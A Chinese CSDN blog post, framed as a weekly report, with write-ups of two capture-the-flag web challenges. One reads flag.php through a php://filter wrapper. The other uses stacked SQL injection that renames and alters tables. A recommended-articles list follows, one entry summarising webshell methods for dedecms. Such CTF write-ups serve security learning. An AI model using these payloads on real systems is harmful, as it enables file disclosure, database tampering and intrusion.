这是个周报

最新推荐文章于 2024-09-14 17:41:03 发布
最新推荐文章于 2024-09-14 17:41:03 发布
阅读量62 收藏
点赞数
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/dmtnb/article/details/130035171
版权

题目一:

进入题目

废话不多说直接查看源代码

发现可疑点,点开看看

得到新源码

发现新文件action.php,打开看看

打开之后开发现了这个

但是看网址感觉有点奇怪

后缀为什么不是原想的action.php而是变为了end.php

看了看网页提示的话,进行抓包.

利用 BurpLoader 进行抓包

发现隐藏文件secr3t.php

打开发现

感觉胜利就在眼前了

打开flag.php

联想到php伪协议, 在后面加上
?file=php://filter/read=convert.base64-encode/resource=flag.php

得到base64编码

解码有

得到flag为

flag{6e4eb0b7-496b-4cba-9db9-ae462e900e57}

题目二:

进入题目

容易看出是SQL注入的题目

先输入1' or 1=1;#试试看能否得到有用信息

目前看来并没有

输入1’; show tables;#

发现两个表,看看里面有什么。

分别输入

0'; show columns from `words`;#

0'; show columns from `1919810931114514`;#

得到

发现flag在1919810931114514这个表中

但是通过前面做题过程中,发现可以看到words表里有两个分别为id data
1919810931114514表里只有一个属性列

那么输入框大概率查询的为words表。

可进行如下操作:

1.先将 words 改为别的名字

2.然后将 1919810931114514 改为 words

3.把属性名flag改为id,通过1’ or 1=1;# 显示flag出来

4.在这之前要先把words表改名

构造playload如下

1';rename table words to words2;rename table `1919810931114514` to words;ALTER TABLE words ADD id int(10) DEFAULT '12';ALTER TABLE  words CHANGE flag data VARCHAR(100);-- q

然后输入1';show tables—q

得到

输入1' or 1=1;#

得到flag

 

安知君惜墨
关注
ChatGPT 辅助生成周报/月报
小Y的博客
08-30 2346
用 ChatGPT 写好一篇工作汇报
Java实习周报通用25篇
03-07
【Java实习周报通用25篇】记录了一个实习生在五个礼拜内的学习和成长历程,涵盖了从适应新环境、熟悉基础语法到深入理解高级概念的过程。 第一周,实习生主要适应了公司环境,意识到实习不仅仅是学习新知识,而是...
一个有趣的周报
MachineLP的专栏
12-09 1057
本周总结可能会多一点,主要在尝试,也作为此类问题的经验分享: 1.尝试:通过maskrcnn检测出器件,抠图后进行数据增强,在旋转时填充背景的时候,会引入很大误差,原因:填充背景是通过图片边缘像素延伸,这样会导致直接延伸的是器件边缘像素。 2.尝试:先数据增强后,再通过maskrcnn进行检测抠图会避免上述问题,原因:这样填充的背景是原图背景,不会将器件像素延伸作为背景。 3.在
java开发周报_Java周报
weixin_36184940的博客
02-13 1864
package com.softeem.basic;//包名 单行注释三种注释方式主方法输出语句文档化注释,能够生成API文档public class Demo_01 {//类名多行注释主函数:主方法,是程序的入口,所有程序的开始和方法的调用都必须在主方法里面1、主函数的写法固定2、一个程序中不能没有主函数,但是一个程序中只能写一个主函数java的数据类型:基本数据类型:整型: byte shor...
优秀产品经理都是这样写周报的(顺便分享个周报模板)
热门推荐
liudada8265的博客
11-10 2万+
今天我想跟大家分享一下关于“写周报”这件事,我的看法、经验心得以及我最近优化更新周报模板的案例,以此来帮助一些不愿意写周报的朋友,希望他们有所收获,能克服“怕写周报”这个恐惧。据我观察,...
周报,当前是第几周 ?
lyndon
08-18 1万+
第几周 ? 上周五发周报,被同事指出,应该是 32 周,而我写的是 31 周。谁有空数这玩意啊,一般就在上周的基础上 +1。如果前面某周搞错了,那后面就要跟着错了。。???? 写个命令 我就在想,要不写个命令,显示当前是第几周。 说干就干,也不用 C 了,直接 shell 写写好了。 先借助 excel 的 WEEKNUM() 函数计算几个典型日期的周数 找到规律后,开写 weeknum.sh #!/bin/bash year=`date +%Y` first_day=`date -d ${year
PMO项目管理周报-模板.pptx
07-28
项目管理周报模板通常由以下几个部分组成: 1. 项目基本信息:包括项目名称、所属部门、项目经理、项目状态等信息。 2. 本周项目进展:包括项目的当前状态、项目经理的工作进展、下周的工作计划等信息。 3. 项目...
项目周报模板(工作周报模板)
04-15
软件开发过程中,技术部门所需要的项目周报模板(工作周报模板),按照模板填空即可; 如有不明白的地方可以给我留言;
富文本编辑器周报工具
09-20
【富文本编辑器周报工具】是一款基于SpringBoot框架开发的应用,主要功能是提供一个便捷的周报生成和管理平台。这款工具利用了H2内存数据库来存储数据,H2是一款轻量级、高性能的关系型数据库,适用于快速开发和测试...
统计周报系统所有同事的最近一篇周报_周报系统_python_统计周报_
09-29
脚本可以把所有同事最近发布的一篇周报标题给抓取出来,这样可以知道哪些同事有没有更新周报了,嘿嘿。 这其实属于爬虫类型的脚本,使用urllib2 模块抓取特定网页,然后使用 re 正则表达式模块进行过滤字符,把需要...
PHP智驭未来悦享生活智慧小区物业管理小程序系统源码
2401_84413757的博客
09-10 708
它集成了多项实用功能,无论是业主还是物业管理人员,都能通过简单的一键操作,轻松实现小区的日常管理。无论是清晨的晨跑,还是夜晚的归家,都不再需要为这些琐事烦恼,真正实现了“智驭未来,悦享生活”。无论是分享生活的点滴,还是参与社区的各类活动,都能让业主们感受到家的温暖和归属感。而今天,我要带大家走进的,正是这股智慧浪潮中的一股清流——“智驭未来悦享生活”智慧小区物业管理小程序。“智驭未来悦享生活”智慧小区物业管理小程序的出现,不仅为小区管理带来了革命性的变革,更为我们描绘了一幅未来生活的美好蓝图。
一码空传临时网盘PHP源码,支持提取码功能
爱酷码的博客
09-11 335
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
[极客大挑战 2019]Http
2201_75556700的博客
09-10 521
3、访问Secret.php发现页面有提示,它说它不是来自这个网页。6、添加X-Forwarded-For: 127.0.0.1。5、修改User-Agent为:Syclover。2、查看页面源码发现一个。
dedecms(四种webshell姿势)
最新发布
2301_81881972的博客
09-14 533
点击【系统】【sql命令行工具】--》多行命令中输入select '<?>' into outfile '+路径+创建文件名。与WPCMS类似,直接修改模板拿WebShel..点击【模板】--》【默认模板管理】【index.htm】-->【修改】在文件修改中添加一句话代码.....如下。点击【模块】【广告管理】--》〔【增加一个新广告】 --》在 【广告内容】 处添加一句话代码--》点击 【确定】账号密码同为admin。
【2025】基于PHP职业病健康管理系统(源码+论文+部署讲解等)
程序员阿龙的博客
09-10 1862
博主介绍: ✌我是阿龙,一名专注于Java技术领域的程序员,全网拥有10W+粉丝。作为CSDN特邀作者、博客专家、新星计划导师,我在计算机毕业设计开发方面积累了丰富的经验。同时,我也是掘金、华为云、阿里云、InfoQ等平台的优质作者。通过长期分享和实战指导,我致力于帮助更多学生完成毕业项目和技术提升。 技术范围: 我熟悉的技术领域涵盖SpringBoot、Vue、SSM、HLMT、Jsp、PHP、Nodejs、Python、爬虫、数据可视化、小程序、安卓app、大数据、物联网、机器学习等方
Thinkphp5实现一周签到打卡功能
Crazy_shark的博客
09-10 731
以上是一个简单的 ThinkPHP5 实现一周签到打卡功能的示例。通过设计合适的数据库结构和控制器逻辑,你可以轻松实现用户签到和连续签到天数统计功能。在实际应用中,可能需要考虑更多的细节,如用户身份验证、签到奖励、接口优化等。
Thinkphp5 + Swoole实现邮箱异步通知
Crazy_shark的博客
09-11 585
通过 Swoole 实现的异步任务处理机制,可以将耗时操作如发送邮件等操作放入后台异步执行,提升用户体验和系统性能。Swoole 的 Task 机制非常适合处理这种场景,结合 ThinkPHP 使得开发异步任务更加简单高效。
【getshell】phpmyadmin后台getshell(4.8.5)
m0_71944965的博客
09-11 618
访问一下 最后getshell
php+mysql日志审计管理系统
python0328的博客
09-10 474
本系统实现了:用户登陆、日志审计、监控规则、用户管理。
写一个计算机学生实习周报
02-14
周报内容: 日期:2023年2月13日 实习生姓名:xxx 实习公司:xxx公司 本周工作内容: 1. 完成了公司网站的维护工作,修复了一些错误,提高了网站的用户体验。 2. 参与了公司新项目的开发工作,学习了新技术,...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值